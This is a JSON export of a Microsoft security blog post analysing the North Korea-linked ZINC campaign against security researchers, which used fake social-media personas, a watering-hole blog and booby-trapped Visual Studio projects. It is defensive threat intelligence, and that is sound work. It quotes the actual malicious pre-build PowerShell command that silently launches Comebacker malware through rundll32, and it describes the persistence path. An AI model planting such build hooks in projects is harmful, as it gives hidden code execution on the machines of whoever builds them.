{"id":92718,"date":"2021-01-28T09:00:55","date_gmt":"2021-01-28T17:00:55","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/?p=92718"},"modified":"2024-05-22T10:44:55","modified_gmt":"2024-05-22T17:44:55","slug":"zinc-attacks-against-security-researchers","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/01\/28\/zinc-attacks-against-security-researchers\/","title":{"rendered":"ZINC attacks against security researchers"},"content":{"rendered":"\n
\n

April 2023 update<\/strong> \u2013 Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. Zinc<\/strong> is now tracked as Diamond Sleet<\/strong>.<\/p>\n\n\n\n

To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy<\/strong><\/a>.<\/p>\n<\/blockquote>\n\n\n

In recent months, Microsoft has detected cyberattacks targeting security researchers by an actor we track as ZINC. The campaign originally came to our attention after Microsoft Defender for Endpoint detected an attack in progress. Observed targeting includes pen testers, private offensive security researchers, and employees at security and tech companies. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to ZINC, a DPRK-affiliated and state-sponsored group, based on observed tradecraft, infrastructure, malware patterns, and account affiliations.<\/p>\n

This ongoing campaign was reported by Google\u2019s Threat Analysis Group (TAG<\/a>) earlier this week<\/a>, capturing the browser-facing impact of this attack. By sharing additional details of the attack, we hope to raise awareness in the cybersecurity community about additional techniques used in this campaign and serve as a reminder to security professionals that they are high-value targets for attackers.<\/p>\n

We also want to thank our industry colleagues at Twitter and GitHub for their collaboration in this investigation and rapid actions to suspend the malicious accounts targeting the security community and our mutual customers.<\/p>\n

We are sharing this information with the community as part of our mission to shine a light on bad actors and elevate awareness of low-profile tactics and techniques that easily fly under the radar of security operations centers (SOCs) or security professionals and are easily overlooked as low-level alerts or benign chatter. The related IoCs and Microsoft Defender for Endpoint<\/a> product detections we share in this blog will help SOCs proactively hunt for related activity in their environments and elevate any low-level alerts for remediation. ZINC used a variety of new techniques to target the victims, including gaining credibility on social media with genuine content, sending malicious Visual Studio projects, and using a watering hole website weaponized with browser exploits.<\/p>\n

Technical details<\/h2>\n

In mid-2020, ZINC started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog. Throughout the lifetime of the campaign, the actor operated several accounts that accounted for roughly 2,000 followers, including many prominent security researchers.<\/p>\n

In the image below, one of the actor-controlled Twitter account retweets another of their accounts to amplify their own posts. The posts from the actors received a reasonable amount of attention, usually accumulating several hundred likes or retweets.<\/p>\n

\"Screenshot<\/p>\n

Figure <\/em>1.<\/em> Actor-controlled Twitter handles<\/em><\/p>\n

After building their reputation across their established social media accounts, the actors started approaching potential targets on social media platforms such as Twitter and LinkedIn. The conversations were often seemingly innocuous, asking security questions or talking about exploit techniques. If the researcher was responsive, the actor would offer to move communication to another platform (e.g., email, Discord) in some cases to then send files using encrypted or PGP protected ZIPs.<\/p>\n

ZINC also used their Twitter accounts to post links to a security blog they owned (br0vvnn[.]io<\/em>). These links were also shared by many others in the security community on Twitter and other social media platforms, further deepening trust for the owner and content.<\/p>\n

A blog post titled DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug<\/em>, was shared by the actor on October 14, 2020 from Twitter. From October 19-21, 2020, some researchers, who hadn\u2019t been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after. This suggests that a Chrome browser exploit chain was likely hosted on the blog, although we haven\u2019t been able to prove this. Since some of the victim\u2019s browsers were fully patched, it\u2019s also suspected, but unproven, that the exploit chain used 0-day or patch gap<\/a> exploits. We believe that not all visitors to the site were compromised, even during the dates listed above.<\/p>\n

Malicious Visual Studio project<\/h3>\n

Some of the files sent by ZINC to researchers were malicious Visual Studio projects that included prebuilt binaries. One of the binaries used the well-known name Browse.vc.db<\/em> but was a malicious DLL rather than a database file. Microsoft Defender for Endpoint detects these DLLs as Comebacker malware. A pre-build event with a PowerShell command was used to launch Comebacker via rundll32<\/em>. This use of a malicious pre-build event is an innovative technique to gain execution.<\/p>\n

An example of the PowerShell in the pre-build event can be seen here:<\/p>\n

<PreBuildEvent><\/em><\/p>\n

<Command><\/em>
powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\\Debug\\Browse.VC.db)){rundll32 x64\\Debug\\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }<\/em>
<\/Command><\/em><\/p>\n

<\/PreBuildEvent><\/em><\/p>\n

Pre-build events are stored in the .vcxproj file in Visual Studio solutions. The page How to: Use Build Events in MSBuild Projects<\/a> has a list of other build events and example XML for the events. It would also be possible to abuse a custom build step in the same way.<\/p>\n

Analyzing Comebacker DLLs<\/h3>\n

Once the malicious Visual Studio Project file was built, the process drops C:\\ProgramData\\VirtualBox\\update.bin<\/em> and adds the file to an autostart registry key. Update.bin (SHA-256: 25d8ae46\u2026<\/em>) is a different 64-bit DLL file embedded inside Browser.VC.db.<\/p>\n